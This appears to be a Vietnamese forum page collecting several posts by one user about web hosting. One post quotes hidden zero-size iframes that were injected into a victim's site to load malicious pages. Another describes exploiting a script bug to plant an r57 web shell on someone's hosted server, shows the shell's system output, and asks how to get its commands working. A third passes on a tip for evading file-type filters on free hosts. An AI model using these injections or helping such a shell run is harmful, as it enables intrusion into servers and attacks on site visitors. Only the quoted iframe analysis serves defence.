Messages posted by: ttkingdom

Mình có một hosting account gần đây mới bị tấn công nhưng chưa tìm ra được phương pháp của thủ phạm.

Shared hosting account của lunarpages.com chứa:
1 phpBB3 forum
1 SMF forum
1 Joomla + bridge SMF + bridge Gallery2

Bỗng nhiên khi vào bất kỳ trang nào cũng xuất hiện vô số message của browser báo download file và làm crash browser. Sau đó mình xem xét các file script thì tất cả các file index.php và các file HTML bị chèn 1 đoạn mã lạ ở cuối

Code:

<iframe src="http://qwehost.com/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Chính đoạn mã này đã wwwect tới 1 trang khác và làm crash browser. Sau đó mình đọc log http và log ftp trong mấy ngày gần đây thì ko phát hiện điều gì lạ (hay là chưa biết cách smilie

)

Mình đã gửi email cho host nhờ remove đoạn mã lạ. Tuy nhiên mình rất thắc mắc là tại sao hacker (hay virus gì) có thể xâm nhập vào và chèn hết mã vào các file như vậy ? Có thể nói rằng hacker có FTP access hay shell access hay ko ? Nếu khó có thể tấn công từ bên ngoài thì có thể là tay trong làm (tại host cũng nhiều người dùng).

Mong mọi người giúp đỡ, nếu cần thiết thì mình sẽ send log http và log ftp.

lnvlslble wrote:

1 số free host dùng để chơi các file dưới 60MB
ctrlalthost.com <-- thằng này okie, nhưng phải leech file dưới 60MB thôi. Trên 60MB nó banned host. Dùng host này để down các soft thì cool lắm.
webs4000.com <-- thằng này ngon nhưng khi leech xong rùi nhớ change đuôi file nhé, VD .zip thì thành .txt hay đại loại thì mới down về được.

webs4000.com -> hình như là web1000.com: 50 MEG Disk Space, Bandwidth Free Hosting

Em newbie mong mọi người giúp đỡ. Cố gắng mày mò, dùng cái bug gamesitescript, up được 1 con r57 lên host.

safe_mode: OFF PHP version: 4.4.4 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF Disable functions : dl

Linux gator243.hostgator.com 2.6.17.11-grsechg #9 SMP Fri Dec 8 00:02:22 CST 2006 i686 i686 i386 GNU/Linux
Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8
uid=32087(envision) gid=32089(envision) groups=32089(envision)

Thực hiện thử mấy lệnh sau
Eval PHP Code
mkdir("new", 0700);
Run Command: ls v..v..
Nói chung là hiện ra trông thế mà chạy lệnh gì thì nó cũng báo:

Forbidden
You don't have permission to access /uploadfiles/6fbf1158.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

/uploadfiles/6fbf1158.php là link của shell. Làm thế nào để chạy được lệnh bây giờ ?

Em có một cái host chạy *nix. Nó có chức năng crontab nhưng em không hiểu rõ lắm về lệnh này. Bác nào có thể chỉ em câu lệnh để thực thi: mỗi tuần 1 lần, zip (tar hay gz) một thư mục lại để 1 bản trên server, một bản gửi cho email của em (có smtp server).